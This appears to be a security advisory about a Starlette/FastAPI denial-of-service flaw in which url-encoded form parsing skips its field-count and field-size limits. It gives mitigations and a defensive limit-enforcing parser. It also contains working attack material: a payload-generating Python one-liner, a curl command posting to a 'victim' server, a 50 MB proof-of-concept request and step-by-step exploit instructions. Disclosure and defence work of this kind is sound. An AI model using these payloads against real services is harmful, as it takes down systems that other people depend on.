The `request.form()` method in Starlette (and FastAPI) accepts `max_fields` and `max_part_size` parameters to limit resource consumption when parsing form data. These limits are enforced correctly for `multipart/form-data` requests, but are completely ignored for `application/x-www-form-urlencoded` requests. Because the url-encoded parser is constructed without receiving these parameters, it performs no field count check and no per‑field size check, appending every field name and value without validation.
An unauthenticated attacker can exploit this in two ways:
1. Field count attack – Sending a body with ~1,000,000 fields (for example, f0=v&f1=v&...), which fits in a sub‑10 MB payload. The synchronous parsing blocks the worker’s event loop for several seconds, during which the worker cannot serve any other requests.
2. Field size attack – Sending a single field with an extremely large value (e.g., 50 MB). The entire value is buffered in memory to build the `FormData` object, causing memory allocation proportional to the request body.
In both cases, parallel requests can render the service completely unusable. A reverse proxy that imposes a request body size limit reduces but does not eliminate the exposure, because the field‑count attack already works with a sub‑10 MB payload. The equivalent `multipart/form-data` request is correctly rejected with a `400 Too many fields` or `400 Field exceeded maximum size` error.
DailyCVE Form:
- Platform: `Starlette/FastAPI`
- Version: `<=1.3.0`
- Vulnerability: `DoS via Form Limits Bypass`
- Severity: `High`
- Date: `2026-06-15`
- Prediction: `2026-07-15`
What Undercode Say
Generate malicious payload (field count attack):

```bash
python3 -c "print('&'.join([f'f{i}=v' for i in range(1000000)]))" > payload.txt
```

Send the attack with curl:

```bash
curl -X POST http://victim:8000/submit \
  -H "Content-Type: application/x-www-form-urlencoded" \
  --data-binary @payload.txt
```

Python proof-of-concept (field size attack):

```python
import requests

large_field = "a" * (50 * 1024 * 1024)  # 50 MB
data = {"big": large_field}
requests.post("http://victim:8000/submit", data=data)
```
Exploit
1. Identify a Starlette or FastAPI endpoint that calls `request.form()`.
2. Craft an `application/x-www-form-urlencoded` POST request with either:
   - millions of small fields (e.g., `f0=v&f1=v&...`) to block the event loop, or
   - a single giant field (e.g., 50 MB) to exhaust memory.
3. Send multiple such requests in parallel to amplify the impact.
Protection
- Upgrade to a patched version of Starlette that forwards `max_fields` and `max_part_size` to the url‑encoded parser.
- Set explicit limits in your code: `request.form(max_fields=1000, max_part_size=1048576)`.
- Use a reverse proxy to enforce a global request body size limit (e.g., 10 MB), though this only partially mitigates the field-count attack.
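The two limits the url-encoded path skips can also be enforced in front of the parser, on the body stream, so neither payload shape above is ever materialised. The following is an added example and not Starlette's own code: it reads body chunks the way an ASGI middleware would, applies the `max_fields=1000` and `max_part_size=1048576` values from the Protection list, and stops at the first chunk that crosses a limit. Function and exception names are assumptions, and the chunk sizes used to exercise it are constructed.

```python
from typing import Iterable, Iterator, List, Optional, Tuple
from urllib.parse import parse_qsl


class FormLimitExceeded(ValueError):
    """Raised the moment a limit is crossed; maps naturally to an HTTP 400."""


def enforce_urlencoded_limits(chunks: Iterable[bytes], *, max_fields: int,
                              max_part_size: int) -> Iterator[bytes]:
    """Yield body chunks unchanged, aborting as soon as a limit is crossed."""
    separators = 0  # fields = separators + 1, the same rule parse_qsl applies
    current = 0  # bytes seen so far in the current field (key and value)
    for chunk in chunks:
        start = 0
        while True:
            idx = chunk.find(b"&", start)
            end = len(chunk) if idx == -1 else idx
            current += end - start
            if current > max_part_size:
                raise FormLimitExceeded(f"field exceeded maximum size {max_part_size}")
            if idx == -1:
                break
            separators += 1
            if separators + 1 > max_fields:
                raise FormLimitExceeded(f"too many fields; limit is {max_fields}")
            current = 0
            start = idx + 1
        yield chunk


def parse_urlencoded_limited(
    chunks: Iterable[bytes], *, max_fields: int = 1000, max_part_size: int = 1048576
) -> Tuple[Optional[List[Tuple[str, str]]], Optional[str], int]:
    """Return (pairs, None, chunks_read), or (None, reason, chunks_read) if refused."""
    body, read = bytearray(), 0
    try:
        for chunk in enforce_urlencoded_limits(chunks, max_fields=max_fields,
                                               max_part_size=max_part_size):
            read += 1
            body += chunk
    except FormLimitExceeded as exc:
        return None, str(exc), read + 1  # +1 for the chunk that tripped the limit
    # Independent second bound from the stdlib parser (ValueError if exceeded).
    pairs = parse_qsl(body.decode("utf-8", "replace"), keep_blank_values=True,
                      max_num_fields=max_fields)
    return pairs, None, read
```

The third element of the result shows how little of a hostile body is touched before it is refused: a 1,000,000-field body is rejected after the 1,000th field and a 50 MB field after roughly 1 MiB, in both cases before any `FormData` object exists.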
Impact
- Event loop blocking – A single request with 1,000,000 fields blocks the worker for several seconds, preventing it from handling any other request.
- Unbounded memory allocation – A single large field (e.g., 50 MB) forces memory allocation proportional to the request body, potentially causing OOM kills or swapping.
- Denial of Service – Parallel requests easily render the service unusable, affecting all Starlette‑ and FastAPI‑based applications that process url‑encoded forms.
Sources:
Reported By: github.com